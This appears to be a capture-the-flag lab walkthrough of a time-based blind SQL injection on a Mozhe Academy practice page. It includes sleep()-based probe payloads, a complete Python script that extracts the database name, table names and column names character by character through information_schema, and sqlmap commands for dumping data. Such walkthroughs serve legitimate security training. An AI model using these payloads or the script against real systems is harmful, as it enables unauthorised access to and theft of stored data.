SQL (time-based blind injection) - 墨者学院 (Mozhe Academy) - vulnerability walkthrough

SQL time-based blind injection

1. The starting page. This is not the injectable page, though; click the 任性网页 link below it.

2. The hint says the parameter is passed in the URL, so append a single quote: ?type=1'

Since the hint says it is a time-based blind injection, try

?type=1' and sleep(5)%23

No delay.

Remove the single quote:

?type=1 and sleep(5)%23

A 5-second delay. That tells us type is used as an unquoted number in the query: with the quote the statement is a syntax error and sleep() never runs, while the bare condition is evaluated and the comment (%23 is the URL-encoded #) cuts off the rest of the query.

Because the only signal is the delay, with nothing echoed back, the data has to be extracted with a Python script or with sqlmap.

Here is the script, but there is an error later on whose cause I could not find; I could only query as far as the fields of the flag and goods tables.

import time
import requests
from requests.adapters import HTTPAdapter

URL = "http://219.153.49.228:44261/flag.php"
DELAY = 2          # seconds the server sleeps when the injected condition is true
THRESHOLD = 1.5    # a response slower than this counts as "true"
CHARSET = '0123456789abcdefghijklmnopqrstuvwxyz,./`?<>-_=+~!@#$%^&*()'

session = requests.Session()
# Close each connection instead of keeping it alive (session.keep_alive is not a
# requests attribute and does nothing) and retry dropped connections. Setting
# requests.adapters.DEFAULT_RETRIES after import also has no effect, because the
# adapter's default argument was bound when requests was imported.
session.headers["Connection"] = "close"
session.mount("http://", HTTPAdapter(max_retries=8))


def is_true(cond):
    """Send `1 and if(cond,sleep(DELAY),1)#` as the type parameter and report
    whether the server slept. Passing the payload through params= lets requests
    URL-encode it, so the '#', '&', '+' and '%' characters in CHARSET reach
    MySQL intact; appending them raw to the URL (with %23 for the comment)
    breaks the request: '#' becomes a fragment and '&' starts a new parameter."""
    payload = "1 and if(%s,sleep(%d),1)#" % (cond, DELAY)
    print(payload)
    start = time.monotonic()
    session.get(URL, params={"type": payload})
    # (time2 - time1).seconds truncates to a whole number; use real seconds
    return time.monotonic() - start > THRESHOLD


def lenStr(name):
    """Length of the string expression `name`, tried from 1 up to 99."""
    for i in range(1, 100):
        if is_true("length(%s)=%d" % (name, i)):
            print("%s len is %d" % (name, i))
            return i
    raise RuntimeError("length of %s not found below 100" % name)


def dumpStr(name):
    """Recover `name` one character at a time. substr() positions are 1-based,
    so the loop runs 1..len (the original started at 0, and column() stopped
    one character short). The comparison is case-insensitive under MySQL's
    default collation, which is why a lowercase charset is enough."""
    value = ''
    for i in range(1, lenStr(name) + 1):
        for j in CHARSET:
            if is_true("substr(%s,%d,1)='%s'" % (name, i, j)):
                value += j
                print("so far: " + value)
                break
    return value


def database():
    return dumpStr("database()")


def table():
    return dumpStr("(select group_concat(table_name) from information_schema.tables "
                   "where table_schema=database())")


def column(table_name):
    cols = {}
    for TB in table_name.split(","):
        # restrict to the current schema: the same table name can exist in
        # another database, which would mix foreign columns into the result
        name = ("(select group_concat(column_name) from information_schema.columns "
                "where table_schema=database() and table_name='%s')" % TB)
        cols[TB] = dumpStr(name)
        print("table:" + TB + "\ncolumn:" + cols[TB])
    return cols


if __name__ == '__main__':
    # database()
    tables = table()
    column(tables)

Fall back to sqlmap instead. Point it at the flag.php URL with -p type and --technique=T so it only runs time-based tests; the screenshots below correspond to:

Dump the databases (--dbs)

Dump the tables (-D <database> --tables)

Dump the columns (-T <table> --columns)

Dump the values (-C <column> --dump)

Back to the first page.

Key technical point: a time-based blind injection returns nothing, so the only signal is whether sleep() fires.

Manual injection means guessing table names and so on one character at a time, which is tedious and tests your fundamentals.
